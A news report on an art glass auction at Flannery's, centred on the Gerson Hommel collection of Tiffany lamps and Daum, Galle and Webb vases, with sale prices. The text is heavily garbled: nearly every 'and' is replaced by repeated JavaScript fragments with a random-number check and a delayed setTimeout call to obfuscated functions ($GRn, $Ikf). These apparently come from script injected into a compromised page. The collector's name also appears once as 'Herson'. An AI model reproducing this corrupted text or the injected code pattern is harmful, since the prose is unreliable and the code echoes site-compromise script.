A large crowd made its way to the gallery to inspect the wide variety of glass that ranged from Tiffany glass andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and lamps to Muller Fres andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and Daum Nancy art glass vases.
The huge assortment of art glass compiled by Gerson Hommel, a 102-year-old enthusiast who built his collection from the early 1960s into the 1990s, made up the core of the offerings. Hommel was a familiar face who was known to have traveled throughout New York State andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and New Englandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and picking glass from antiques shops andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and auctions for decades. Many of the pieces were accompanied by the receipts that the collector received at the time of his purchase.
Not only was a full house of buyers on handom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and for the sale, but Internet bidding was competitive, although it was most often outpaced by those in the gallery andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and on the telephones.
Leading the sale was one of Herson’s prize possessions, a rare 18-light Tiffany Lily lamp on the original marked bronze base. Each of the shades was marked andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and the catalog noted minor damage to two of the shades at the socket connection. Bidding on the lamp was brisk, with it selling at $37,950. Another of the top lots came as an unsigned Tiffany shade with an unusual Favrile drop ball border was offered. The blue-hued Sunburst shade with 23 jewels andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and the glass balls set in bronze claws did well at $32,200.
Art glass vases also brought premium prices, with a rare Daum Nancy enameled butterfly vase leading the grouping. Decorated with two butterflies in a colorful floral scene, the vase measured 11 inches tall andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and more than 6 inches wide. The vase was signed at the base andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and also decorated with the Lorraine Cross in gold. Bidding on this lot was also brisk; it finished at $19,550.
Another impressive vase from the Hommel estate was a 16-inch-tall Galle plum vase in brilliant purples cut back to yellows. The receipt accompanying this lot indicated that Hommel purchased the vase in 1968 from M.P Laurence Antiques. The colorful signed vase elicited strong bids from the crowd, opening for bidding at $9,000 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and closing moments later to a telephone bidder for $13,800.
One lot that drew a ton of competition from the gallery andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and the telephones was a large blue cameo vase by Thomas Webb. This lot was also accompanied by a receipt that indicated it had been purchased in Massachusetts in 1968 from Philip M.M. Pont. Exquisitely decorated, the vase opened for bidding in the gallery at $2,000, with competition eventually narrowing to two telephone bidders that battled it out to a final price of $9,200.
Other top lots included a Galle vase with enameled flowers that brought $9,200, andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and the same price was realized for a Galle Persian vase with a soldier mounted on horseback decoration. An impressive Mt Washington Royal Flemish satin glass vase realized $8,050.
While strong prices were paid for many of the top lots, there was a wide selection of affordable pieces that ranged from a Steuben blue Aurene flora-form vase at only $805 to a Webb satin glass Coralene at $115 andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and a small Muller Freres cameo glass vase depicting a lake scene that went out at $431.
All prices include the buyer’s premium.
The next auction at Flannery’s will be the estate sale of Mark Ponton of Roosevelt Islandom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and, N.Y., featuring a lifetime collection of fine art andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}and early furniture.
